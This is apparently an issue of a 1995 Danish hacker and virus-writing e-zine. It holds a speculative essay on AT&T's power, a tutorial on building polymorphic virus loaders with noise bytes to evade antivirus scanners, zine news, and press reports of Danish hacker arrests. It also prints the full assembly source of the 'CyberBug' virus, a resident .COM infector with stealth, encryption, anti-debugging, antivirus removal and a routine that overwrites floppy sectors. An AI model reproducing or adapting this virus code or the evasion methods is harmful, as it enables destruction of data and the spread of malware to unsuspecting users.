34 fabriker udenfor USA -Hvilket er 16 i Europa, 12 i Asien, 5 i Latin Amerika og 1 i Canada. þ AT&T har 1 fabrik i Sinapore vor 3,270 personer er ansat, her bliver der produceret AT&T's tr†dl›se telefoner, samt produktionen af Sikkereds-systemmer. -En fabrik i Bangkok, Thailand ar 850 personer der arbejder p† at lave telefoner samt telefon-svarer systemmer -En fabrik i Guadalajara, Mexico som procedure telefonsvarer- systemmer. -AT&T Microelektronik laver produkter i b†de Thailand, Spanien, Mexico, Singapore og England. þ AT&T Kapital Corp., har $6 billioner kroner i pungen, med finansering af b†de AT&T og ikke-AT&T produkter samt servicer i Canada og Europe. AT&T har gennem tiden lavet kontrakter med disse lande, om at levere telefon- linier over hele landet: BELGIUM BULGARIA CZECHOSLOVAKIA FRANCE GERMANY GREAT BRITAIN ITALY THE NETHERLANDS POLAND SPAIN SWITZERLAND ASIA BRUNEI HONG KONG INDIA INDONESIA JAPAN CHINA PHILIPPINES SINGAPORE SOUTH KOREA SRI LANKA TAIWAN THAILAND THE CARIBBEAN CENTRAL AMERICA MEXICO SOUTH AMERICA BRAZIL CHILE VENEZUELA CANADA MIDDLE EAST EGYPT KUWAIT SAUDI ARABIA Dette er s†dan set alle st›rre lande, dog er denne liste fra en officiel kilde fra AT&T udgivet i 1992, der vil nok v‘re flere lande nu, da AT&T hele tiden er p† farten for at blive st›rre og st›rre. Som det ses, er AT&T ikke stoppet ved bare at levere telefon-linier, men de er ogs† en af de st›rre producenter af EDB-l›sninger til virksomheder, samt sikkerheds-systemmer til st›rre virksomheder - De er s†gar igang med at bygge en kreds uden om den private computerscene, med billige og samtidig kraftfulde computer, allerede nu er computer-leverand›ren til KTAS nemlig AT&T... Om bare nogle f† †r er monopolet p† det danske telefon-net til r†dighed, hvilket ikke har g†et fordi AT&T's ›re stille. AT&T er ogs† den mest sand- synlige tele-virksomhed der vil modtage monopolet p† de danske telefonlinier, fordelen er dog at alle lokale-telefon opkald vil blive gratis, men stadig bliver det en fordel for AT&T der vil f† magten over et land mere end de nu- tidig har.. AT&T har allerede magt nok til at kunne lukke mindre lande totalt ned, og hvis de bliver for store, kan de s†gar l‘gge hele verden for deres f›dder. Med den fart AT&T har p†, kan man godt mist‘nke koncernen at p† et tidspunkt at overg† til et meget og endda for stort penge-syndikat, hvilket b†de kontrollere b†de komunikationen, sikkerheden samt kontakten, hvis AT&T lukker ned for bare et land, vil helvede s†dan set g† l›s, da man helt mister alt komunikation til det land.. Sagt p† en anden m†de, at hvis et firma f†r nok magt over komunikationen vil selv den mindste manipulation af komunikationen volde verden store problemmer, en manipulation af komunikationen vil endda kunne forudsage krige over hele orden, da ingen kan f›le sig sikker p† at det der kommer ud i den anden ende af r›ret passer 100 % til det der rent faktisk bliver sagt i den anden ende... Som sagt : Den der kontrollere komunikationen, kontrollere verden..... þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ En Polymorphic Virus Af Clive Sharp 1. Generelt Mange af jer har sikkert h›rt om polymorphic virus'er, men det er de f‘rreste der ved, hvordan man laver en, som er andet en bare at kryptere virus'en, som jo ikke altid er specielt effektivt, for at sige det p‘nt. 2. Anti-virus Men f›rst skal vi se p† hvad anti-virus programmerne kigger efter, n†r de pr›ver at stoppe en virus: þ Kender anti-virus programmet denne virus. Dette g›res ved at s›ge efter nogle offentligt kendte strenge, som er unikke for pr‘cis denne virus. Nogle strenge kunne f.eks. v‘re: þ "Made by Dark Avenger", þ "141$Flu" (Dette er den aktuelle streng fra Cascade). Dvs. at hvis man har en krypteret virus, hvor der aldrig er den samme streng at s›ge efter, s† kan et anti-virus program ikke finde denne virus. Der er desv‘rre ikke rigtigt, for at dekryptere virusen, skal man bruge et lille program (en "load- er"), og s† kan anti-virus programmet bare s›ge p† denne "loa- der". Dette vil vi se meget mere til om lidt. Problemet med at s›ge efter strenge er, at anti-virus folkene jo skal have en kopi af programmet, f›r de kan finde en streng. Dvs. der vil g† noget tid f›r der kommer et anti-virus program der kan finde ens virus, ligemeget om den er krypteret eller ej. þ Nogle anti-virus programmer tager et "billede" af din harddisk hvor den kan se hvis nogle af filerne vokser (et tydeligt tegn p† at man har en virus). þ Nogle virus scannere kigger hukommelsen igennem efter mist‘nk- elige rutiner (DOS interrupt) o.s.v. Dette er dog de f‘rreste, da de er temmeligt ustabile (til vores fordel). þ En ny slags virus scanner er kommet fra Dr. Solomon's S&S Int- ernational. Den hedder: "Generic Decryption Engine", og den g›r f›lgende (meget kort): Hvis den finder noget der kunne v‘re en krypteret virus, dekryptere den virus'en (ved hj‘lp af "Fuzzy Logic"), og kan derfor finde en del af de polymorphic viruser der er "p† markedet" idag. 3. En "normal" virus Derefter skal vi se p†, hvad en "standart" virus er opbygget af. Dette kan virke lidt element‘rt for nogle af jer, men jeg vil gerne have, at selv de slemmeste WaR3z D0dEz forst†r dette, derfor: þ En "dropper", dvs. det program der bringer virusen ind i din computer, men ikke selve virusen. Dette kan v‘re et special lavet program, eller bare nogle tilf‘ldige WaR3Z. þ Overtagelse af systemet (dette har ikke nogen videre interesse for os, s† det vil vi ikke uddybe n‘rmere). þ Kryptering/dekryptering (en "loader"). Mange tror, at er en virus krypteret, s† er den polymorphic og kan ikke findes af anti-virus programmer. Begge dele er forkert! Dette vil vi se meget mere til senere. þ Anti-antivirus [Retro]. De lidt mere avancerede virus'er chec- ker om der er nogle anti-virus programmer residente i hukommel- sen, eller om der ligger nogle scannere p† harddisken. Hvis de finder nogle antivirus programmer, bliver disse "sl†et fra", eller p† andre m†der omg†et. (Dette vil ikke blive n‘rmere uddybet her). þ Derefter l‘gger virusen sig ned i boot-sektoren eller i .com/ .exe filer. Dette vil ikke blive beskrevet n‘rmere. þ De fleste viruser har ogs† en "payload", som f.eks kan v‘re at slette hele din harddisk, eller spille en lille melodi. Dette har ingen interesse for os. Dette var en meget kort gennemgang af hvordan en virus virker, og jeg h†ber at den ikke var alt for overfladisk, men da dette jo handler om polymorp- hic virus'er, er det kun det lille "loader" program, der har vores interesse. 4. "Loaderen" For at se forskellen p† en krypteret virus, og en "normal" ikke krypt- eret virus er her to illustrationer: a. ÉÍÍÍÍÍÍÍÍÍ» º º º º º º º º º º º Kode º En IKKE krypteret virus. º º º º º º º º º º ÈÍÍÍÍÍÍÍÍͼ b. ÉÍÍÍÍÍÍÍÍÍ» º º º"LOADER" º º º ÌÍÍÍÍÍÍÍÍ͹ º Kryp- º º teret º En krypteret virus. º kode º º º º º º º º º ÈÍÍÍÍÍÍÍÍͼ Alle burde nu have forst†et, at det er "loaderen" der er problemet, da man kan have den vildeste kryptering, men hvis man bruger den samme "load- er" s† hj‘lper det bare ikke. "Loaderen" skal g›res polymorphic. 5. The polymorphic loader Det vi skal g›re, for at g›re vores virus polomorphic er, at f† vores "loader" til at muterer. Det g›res p† f›lgende m†de: þ For hver kommando vi har i vores "loader" (dekrypter), finder vi nogle andre kommandoer, som resulterer i, at de scan strenge der bruges, ikke l‘ngere er korrekte, f.eks.: þ INC DI bliver kan blive til: ADD DI,1 eller til ADD DI,3 - SUB DI,2 o.s.v. Resultatet er, at den samme kommando bliver udf›rt (registeret DI bliver 1 st›rre), men p† en forskellig m†de hver gang! Der kan ogs† skiftes mellem de registrer der er i computeren, da det ogs† giver nye scan strenge. Det vil sige, at hver gang er der 3-5 muligheder for at erstatte den f›rste kommando, 3-5 muligheder for at erstatte den 2 kommando o.s.v. Desv‘rre er det rimeligt nemt for anti-virus programmerne at lave lidt statistisk regning, og med h›j sansynlighed at sige: her er en virus. Men det problem kan ogs† fikses, nemlig med "Noise Bytes". þ "Noise Bytes" er nogle kommandoer, som ikke har nogen betyd- ning for udf›relsen af vores program, men som virker forvir- rende, og som g›r det sv‘rere at lave statistisk regning p† vores virus. Nogle kommandoer kan f.eks v‘re: þ CLI (Clear Interrupt Flag) STI (Set Interrupt Flag) NOP (No Operation) þ MOV DI,12 (Forudsat at vi ikke bruger DI) MOV CX,1234 (Forudsat at vi ikke bruger CX) O.S.V. Det vil sige, at n†r man har 3-5 (eller flere) funktioner, som g›r det samme, og bruger et variabelt antal "Noise Bytes", s† har man en Polymorphic virus. 6. Forskellige former for viruser Her til sidst vil jeg vise en lille oversigt, over div. former for viruser: þ En standart, ikke krypteret virus: 84 85 4D 25 14 5E 8F 65 07 82 6A 4C 88 A9 B2 65 E1 38 3B AA 8D ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ Normale kommandoer ÄÄÄÄÄÄÄÄÄÄÄÙ þ En standart, krypteret virus: 87 45 2A 78 3D 6B 76 AB XX XX XX XX XX XX XX XX XX XX XX XX XX ³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ "Loader" ÄÄÙ ³ Krypteret data ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ þ En semi-Polymorphic virus: "Loader" ÄÄ¿ ³ ÚÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄ¿ ³ ³ 87 45 3D YY YY YY 74 AB XX XX XX XX XX XX XX XX XX XX XX XX XX ³ ³ ³ ³ ÀÄÄÄÂÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ "Noise Bytes"Ù ³ Krypteret data ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ þ En Polymorphic virus: "Loader" ÄÄ¿ ³ ÚÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄ¿ ³ ³ ZZ ZZ ZZ YY YY YY ZZ ZZ XX XX XX XX XX XX XX XX XX XX XX XX XX ³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄÂÄÄÙ ÀÄÄÄÂÄÄÙ ÀÄÂÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ ³ ³ Var. funk. ³ ³ ³ "Noise Bytes"Ù ³ ³ Variable funktioner Ù ³ Krypteret data ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Med variable funktioner (var. funk.) menes der selvf›lgeligt f›romtalte metode til at mutere loaderne, med forskellige kommandoer, som g›r det samme. 7. Konklusion For at g›re en virus 100% Polymorphic skal den have: þ Et variabelt antal "Noise Bytes". þ Flere forskellige m†der at udf›re en kommando p†. þ Brugen af flere forskellige registre. þ Variabel l‘ngde ("loader" og event. krypteret data). þ Forskellig kryptering af data'en. Jeg h†ber, at dette har hjulpet dem, der ikke vidste hvordan en Poly- morphic virkede, s† nu skal du bare lave en...... þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ Hvad vil fremtiden bringe for Dommedag Nu? Af Clive Sharp I den n‘rmeste fremtid vil der ske mange ‘ndringer med Dommedag Nu / SMERSH. Vi regner med, at efter Dommedag Nu nr. 5. (som sandsynligvis vil blive released til The Party i julen 1995), s† stopper vi enten bladet, eller s† ‘nd- re vi bladet til en slags "nyhedsbrev", som s† vil udkomme oftere, og i mindre st›rrelse (5 - 20 K), og kun omhandlende (ca.) et emne. Alt dette kommer selv- f›lgeligt an p†, hvor meget materiale vi f†r fra alle jer k‘re l‘sere, da vi ikke selv magter at producere nok materiel til et blad i denne st›rrelse (da vi jo ogs† har et liv at leve ved siden af Dommedag Nu). Vi regner med, at PLAN B g†r ned i l›bet af max. 1-2 m†neder, men det vil komme op igen (grunden er at vores SysGud, Deja-Vu, har nogle, hmm "Person- lige problemer"), men imens vil Darkside Connection v‘re vores "hovedkvarter". I Dommedag Nu nr. 5. f†r vi en masse sp‘ndende nye ting at vise jer, det skyldes ikke mindst, at SMERSH har f†et nogle nye medlemmer, som rykker, p† mange omr†der, s† det skal nok blive et sp‘ndende blad. Desuden vil Danmarks Super-Virus-Koder, Darkman, lave en polymorphic engine til os, en s†kaldt DDN-M (hmmm). Den skal nok v‘re v‘rd at vente p†. Ellers vil vi bare anbefale alle jer der er interesseret i HPV, at v‘re til The Party (julen 1995), for selvom at det er et WaR3z party, s† er det en god mulighed for alle HPV folk at m›des. V‘r der! þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ CyberBug v. 1.00 Af TorNado (Indledning af Clive Sharp) Ja, s† er den her. Bladets f›rste virus (bortset fra Quicksilver virus'en, ikke Deja-Vu?). Det er ellers imod vores politik, at have artikler i bladet, som ikke skrevet p† dansk, men vi har diskuteret lidt frem og tilbage, og er n†et til den konklusion, at det vil lyde dumt, og v‘re kraftigt menings- forstyrrende, at overs‘tte det til dansk, s† i m† leve med det, som det er. ;============================================================================ ; ; Virus Name : CyberBug v. 1.00 ; Length : 757 bytes ; Author : TorNado ; Origin : Denmark 1995 ; ; Description : -- Resident .COM infector ( 4bh = execute ) ; -- File stealth 11h / 12h find first / find next ; -- XOR - Encryption ; -- Intercept INT24 ( Critical Error Handler ) ; -- Anti-Debugging ; -- Saves Time / Date / Attributes ; -- Infect COMMAND.COM ; -- Create file cyberbug.bat ( 3ch = file create ) ; the BATCH file will contain one single line which ; is " echo > clock$ " ; -- Remove VSAFE from memory ; -- Change drive to A:\ at a bad time (nuke tracks) ; ; To Compile : -- TASM /m2 cyberbug.asm ; TLINK /t cyberbug.obj ; ;============================================================================ cyberbug segment assume cs:cyberbug,ds:cyberbug,es:cyberbug org 100h start: call delta vir_size equ codeend-start delta: call $+3 int 1h call fuck_tbscan call deltaOFF ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Get delta offset and decrypt virus ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ deltaOFF: pop bp sub bp,offset deltaOFF call encrypt_decrypt ;decrypt virus ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Remove VSAFE, make cleaning impossible and drop program ( cyberbug.bat ) ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ begin: call vsafe call anti_debug call drop_program jmp short doit ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Confuse TBSCAN ( no flags on infected files at all !! ) ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ fuck_tbscan: mov ax,0305h ; keyb i/o xor bx,bx int 16h ret anti_debug: mov cx,09ebh mov ax,0fe05h jmp $-2 add ah,03bh jmp $-10 int 21h ret go_resident: mov ax,[si] mov es:[di],ax mov ax,[si+2] mov es:[di+2],ax cli ; Disable interrupts mov ds:[si],bx mov ds:[si+2],es sti ; Enable interrupts ret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Prepare virus to go resident hook some memory ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ doit: mov cx,es dec cx mov es,cx mov bx,es:[03h] mov dx,offset codeend-offset start mov cl,4 shr dx,cl add dx,4 mov cx,es inc cx mov es,cx sub bx,dx mov ah,4Ah int 21h ; do it jc do_work ; jump to ok dec dx mov ah,48h ;allocate enough mem for virus mov bx,(vir_size+15)/16 int 21h jc do_work ; jump to ok dec ax ;ax-1 = MCB mov es,ax mov word ptr es:[1],8 ;Mark DOS as owner mov si,offset offset start add si,bp sub ax,0Fh mov es,ax mov di,0100h mov cx,offset codeend-offset start cld rep movsb xor ax,ax mov ds,ax mov di,offset oldint21 mov si,084h mov bx,offset virusint21 call go_resident do_work: push cs pop es push es pop ds mov di,0100h mov si,offset buffer add si,bp movsw movsb pop cx pop ax xor dx,dx push dx xor bp,bp xor si,si xor di,di mov bx,0100h push bx xor bx,bx retn ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; If u change to drive A:\ ther is a little chance it might get fucked up!! ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ read_floppy: push ax bx cx dx bp si di ds es cmp dl,0 je floppy_time jne runforit floppy_time: mov ah,2ch int 21h cmp cl,55 ; minute = 55 ? jge kill_floppy jmp runforit kill_floppy: cli cwd mov cx,255 int 26h sti runforit: pop es ds di si bp dx cx bx ax jmp function21 virusint24 proc far mov al,0 iret virusint24 endp ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; FCB stealth no file size change on infected files in DIR listing ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ FCB_stealth: pushf push cs call function21 cmp al,00 jnz dir_error push ax bx es mov ah,51h ; Get active PSP to int 21h ; es:bx mov es,bx cmp bx,es:[16h] jnz error_stealth mov bx,dx mov al,[bx] ; al = current drive push ax mov ah,2fh ; get dta area int 21h pop ax inc al jnz normal_fcb ext_fcb: add bx,7h normal_fcb: mov ax,es:[bx+17h] and ax,1fh xor al,01h jnz error_stealth and byte ptr es:[bx+17h],0e0h ; substract virus len sub es:[bx+1dh],(vir_size) sbb es:[bx+1fh],ax error_stealth: pop es bx ax dir_error: iret jmp_read_floppy:jmp read_floppy ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Check for every execution that is made look for .COM files ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ virusint21 proc near cmp ah,4bh ; Check for execution je infectCOM cmp ah,11h ; FCB find first je FCB_stealth cmp ah,12h ; FCB find next je FCB_stealth cmp ah,0eh ; Change Drive? je jmp_read_floppy virusint21 endp function21: jmp dword ptr cs:[oldint21] iret jmpforme: jmp popALL ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Infection routine clear attributes, get time and write and encrypted copy ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ infectCOM: push ax bx cx dx bp si di ds es intercept24: push ds push dx mov ax,3524h int 21h mov word ptr cs:[save_int24],bx mov word ptr cs:[save_int24+2],es push cs pop ds mov dx,offset virusint24 mov ax,2524h int 21h pop dx pop ds mov ax,4300h int 21h mov word ptr cs:[save_attrib],cx jc jmpforme mov ax,4301h xor cx,cx int 21h mov ax,3d02h int 21h push ds push dx push cs pop ds mov bx,ax mov ax,5700h int 21h mov cs:[save_time],cx mov cs:[save_date],dx mov ah,3fh mov dx,offset buffer mov cx,3 int 21h cmp word ptr cs:[buffer],'ZM' ; Check if EXE file je close mov ax,4202h ; move file pointer call f_pointer sub ax,offset codeend-offset start+3 cmp ax,word ptr cs:[buffer+1] je close add ax,offset codeend-offset start mov word ptr cs:[new_jmp+1],ax ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Get a random number from DOS time and use it as encryption key ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ mov ah,2ch ;get random number from time int 21h mov word ptr ds:[enc_value],dx ;store it mov ax,08d00h mov es,ax mov di,100h mov si,di mov cx,(vir_size+1)/2 rep movsw push es pop ds xor bp,bp call encrypt_decrypt ;and encrypt mov ah,40h ;write it to file mov cx,vir_size mov dx,offset start int 21h push cs pop ds jc close mov ax,4200h call f_pointer mov ah,40h mov cl,3 mov dx,offset new_jmp int 21h ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Save original time / date / attributes and close the file ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ close: stealth_marker: mov ax,5701h mov dx,cs:[save_date] mov cx,cs:[save_time] and cl,0e0h ; stealth marker "value" inc cl int 21h mov ah,3eh ; Close file int 21h pop dx pop ds mov ax,4301h ; restore old attrib mov cx,word ptr cs:[save_attrib] int 21h push ds ; restore int24 pop ds mov ds,cs:[save_int24+2] mov dx,cs:[save_int24] mov ax,2524h int 21h popALL: pop es ds di si bp dx cx bx ax jmp function21 f_pointer: cwd xor cx,cx ; clear CX int 21h ; do it ret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Lets take down VSAFE from memory so it dosen't complain !! ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ vsafe: mov ax,0fa01h mov dx,5945h int 21h ret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; This is the part that drops a small BATCH file in current dir ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ drop_program: lea dx,[bp + offset filename] ; this creates our push ds ; little signature push cs pop ds mov ah,3ch mov cx,3 int 21h jc no_drop xchg ax,bx mov ah,40h mov cx,(drop_end - drop_start) lea dx,[bp + offset drop_start] int 21h mov ah,3eh int 21h no_drop: pop ds ret drop_start: evil db 'echo > clock$',0 drop_end: virusname db '[ CyberBug v. 1.00 ]' author db '[ made by TorNado DK ]' filename db 'Cyberbug.bat',0 save_time dw 0 save_date dw 0 save_attrib dw 0 oldint21: dd ? save_int24 dw 2 dup (?) buffer db 90h,0cdh,20h new_jmp db 0e9h,00h,00h enc_end: ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; End of encryption the code below this point is unencrypted ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ enc_value dw 0 encrypt_decrypt:mov dx,word ptr ds:[bp+enc_value] lea si,[bp+doit] mov cx,(enc_end-doit)/2 xor_loop: xor word ptr ds:[si],dx inc si inc si loop xor_loop ret codeend: cyberbug ends end start þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ Nyheder (taget, stort set, fra den Danske dagspresse). Nyheder, informationer og andet godt, som man burde l‘se HACKERE BUSTET ---------------- - Darkseed Pharzyde / 2nd2none (BudBreath/TRoSD) blev busted her forleden morgen, da de havde hacket sig ind p† AAU-Inet server, i l›bet af de sidste m†neder. Politiet havde i nogle m†neder aflyttet og log'et alle data-signaler over telefonen. S† klokken 7:30 den 22 marts (1995 selvf›lgelig), bankede 3 politim‘nd p‘nt p† d›ren og havde efter nogle timer konfiskeret alt hardware de overhovedet kunne finde, inklusiv h›jtalere og HIFI-Udstyr. Blandt hardwaren var flere Gigabytes software, en del DAT-b†nd og tonsvis af QIC-b†nd. Men, det skal dog siges at anklagerne mod BudBreath/TRoSD nok kun blive for hacking og ikke for warez-aktiviteter. HACKERE ANHOLDT ----------------- Original Af: Bo Elkj‘r Olsen [Ekstra-Bladet, 27 Marts 1995] - Darkseed Ny razzia mod danske hackere... Onsdag den 22. marts slog politiet igen til mod de danske hackere. Klokken 7.30 om morgenen blev der banket p† d›rene hos tre hackere i K›benhavn og i lborg-omr†det. De unge hackere blev taget med til forh›r og deres v‘relser grundigt ransaget. Alene hos den ene 'Pharzyde' fra lborg-omr†det, blev der konfiskeret edb-udstyr og programmer 'for over 70.000 kroner'. De tre anholdte hackere er under mistanke for at have hacket p† rhus Universitets computere, hvorfra de er s›gt ud p† Internet. Hackerne har i tre m†neder haft 'superbruger'-status - det vil sige fri kontrol over universitets-computerne. - Jeg vidste ikke engang, at det var en superbruger-konto, fort‘ller 'Pharzyde' til Ekstra Bladet. 'Pharzydes' telefon er blevet aflyttet siden begyndelsen af februar, da politiet kom p† sporet af ham. Politiet er i stand til at aflytte datatrans- missioner op til en hastighed p† 14.400 baud, det vil sige bogstaver i sekundet. 'Pharzyde' har kun brugt superbruger-kontoen til at komme ind p† Internet, hvor han har hentet gratis programmer og spil. Det var ikke s›ndag 